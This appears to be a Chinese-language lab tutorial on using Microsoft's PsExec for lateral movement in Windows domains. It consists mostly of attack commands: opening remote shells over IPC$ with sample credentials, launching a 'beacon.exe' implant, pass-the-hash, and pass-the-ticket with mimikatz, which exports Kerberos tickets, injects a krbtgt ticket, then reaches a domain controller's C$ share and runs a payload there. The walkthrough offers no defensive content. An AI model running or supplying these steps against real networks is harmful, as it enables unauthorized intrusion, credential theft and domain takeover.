
PsExec介绍psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口只需要对方开启admin$共享和ipc$ (该共享默认开启依赖于445端口)。但是假如目标主机开启了防火墙防火墙禁止445端口连接psexec也是不能使用的会提示找不到网络路径。由于psexec是Windows提供的工具所以杀毒软件将其列在白名单中下载地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstoolsPsExec使用条件1、具有正确的凭证内存凭证、账号密码、账号NTLM Hash2、能建立IPC链接也就是需要通过smb认证的且目标机器开启了共享默认开启的并且目标共享中必须有admin$共享3、2008的域内主机PsExec常用参数psexec \\ip -u administrator -p admin cmd进⼊半交互式shellPsExec -accepteula \\192.168.108.101 -s cmd.exe建立交互的shellpsexec \\ip - uadministrator -p admin -w c:\cmd进⼊交互式shell且c:\是⽬标机器的⼯作⽬录psexec \\ip -u administrator -p admin whoami all执行命令psexec \\ip -u administrator -p admin -d c:\beacon.exe执行文件psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件实验复现IPC$下的psexec上传psexec建立IPC$连接net use \\192.168.113.152\ipc$ qax123 /user:administratorshell net use \\192.168.113.152\ipc$ /del #删除连接时用返回交互的shell或者执行命令psexec.exe -accepteula \\192.168.113.152 -s cmd.exe返回交互shell必须是msf或者远程到桌面CS不行psexec.exe -accepteula \\192.168.113.152 -s ipconfig远程执行命令shell C:/Users/jack/Desktop/psexec.exe -accepteula \\192.168.113.152 -s ipconfig后面就可以让他远程上线PTH下的psexec找到登录的凭证找到和扫描地址进行psexec攻击上线填写信息上线PTT下的psexec上传psexec进行PTT攻击导出内存的票据mimikatz sekurlsa::tickets /exportshell dir执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。清除内存中的票据shell klist purgemimikatz kerberos::purge两个都是清除票据将高权限的票据文件注入内存mimikatz kerberos::ptt [0;23ded]-2-0-40e00000-Administratorkrbtgt-TEST.COM.kirbie…..好像有转义的问题那就换一个好听的名字# 原文件名 → 新文件名shell ren C:\Users\jack\Desktop\[0;23ded]-2-0-40e00000-Administratorkrbtgt-TEST.COM.kirbi krbtgt.kirbimimikatz kerberos::ptt krbtgt.kirbi访问域控目录shell dir \\dc.test.com\c$shell dir \\dc\c$远程上线psexec.exe \\dc.test.com -h -d c:\123.exe